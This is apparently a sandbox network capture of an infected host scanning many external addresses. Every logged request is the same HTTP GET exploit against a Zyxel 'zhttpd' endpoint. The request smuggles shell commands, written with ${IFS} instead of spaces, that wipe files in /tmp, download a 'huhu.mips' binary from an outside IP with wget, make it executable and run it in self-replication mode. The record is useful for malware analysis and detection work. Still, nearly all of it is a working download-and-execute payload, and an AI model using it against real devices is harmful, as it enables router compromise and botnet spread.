                                              Jan 29, 2024 07:03:50.006751060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4359192.168.2.143439073.95.176.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006786108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4360192.168.2.144673240.44.29.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006861925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4361192.168.2.144659074.108.14.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006879091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4362192.168.2.1451806129.158.2.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006918907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4363192.168.2.1455872132.83.19.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006949902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4364192.168.2.145474012.164.46.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006972075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4365192.168.2.1448990110.200.124.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.006994963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4366192.168.2.144643046.213.211.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007046938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4367192.168.2.1450276219.70.169.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007075071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4368192.168.2.144693678.75.72.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007122993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4369192.168.2.1458882177.51.110.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007165909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4370192.168.2.1432872142.147.122.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007199049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4371192.168.2.144538627.250.166.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007247925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4372192.168.2.1445318210.29.174.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007291079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4373192.168.2.145674488.133.202.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007323980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4374192.168.2.144361861.65.99.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007369041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4375192.168.2.144428084.40.76.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007400990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4376192.168.2.145081673.249.252.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007431984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4377192.168.2.1436792202.111.231.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007477999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4378192.168.2.1447010156.159.180.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007513046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4379192.168.2.1455600142.233.76.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007544994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4380192.168.2.1450112165.37.27.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007581949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4381192.168.2.1450026138.243.196.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007628918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4382192.168.2.145921463.24.13.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007669926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4383192.168.2.145772663.127.38.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007709026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4384192.168.2.1455184107.227.59.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007772923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4385192.168.2.1445226130.145.231.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007798910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4386192.168.2.1433254190.26.107.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007863998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4387192.168.2.1460966125.74.149.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007917881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4388192.168.2.1449040141.62.147.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007951975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4389192.168.2.1434912160.62.117.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.007988930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4390192.168.2.1438496182.62.158.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008039951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4391192.168.2.1446780199.184.53.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008070946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4392192.168.2.145399859.161.244.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008119106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4393192.168.2.1451062174.184.7.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008162022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4394192.168.2.144414480.68.195.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008191109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4395192.168.2.1452756100.205.106.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008225918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4396192.168.2.1458852111.46.6.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008243084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4397192.168.2.145953618.204.73.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008279085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4398192.168.2.143292623.227.123.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008332968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4399192.168.2.1455652106.132.252.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008362055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4400192.168.2.143768034.193.51.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008403063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4401192.168.2.1459768204.144.91.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008438110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4402192.168.2.1449218109.22.37.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008487940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4403192.168.2.1432980162.91.69.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008543968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4404192.168.2.143371098.194.51.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008567095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4405192.168.2.14604865.109.144.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008621931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4406192.168.2.1454318126.66.54.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008651018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4407192.168.2.1452038100.248.32.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008691072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4408192.168.2.1458554188.208.153.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008721113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4409192.168.2.1455470217.11.203.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008765936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4410192.168.2.144744666.253.31.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008805990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4411192.168.2.144805675.204.113.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008858919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4412192.168.2.1458476197.223.146.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008887053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4413192.168.2.14457185.194.67.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008923054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4414192.168.2.144558662.236.215.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.008958101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4415192.168.2.1449626135.77.70.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009022951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4416192.168.2.1449614122.144.240.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009054899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4417192.168.2.143376634.42.157.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009097099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4418192.168.2.143484813.66.56.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009146929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4419192.168.2.145594294.196.177.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009169102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4420192.168.2.144953813.33.131.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009224892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4421192.168.2.145035213.129.65.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009259939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4422192.168.2.144803450.187.43.160443
                                              TimestampBytes transferredDirectionData
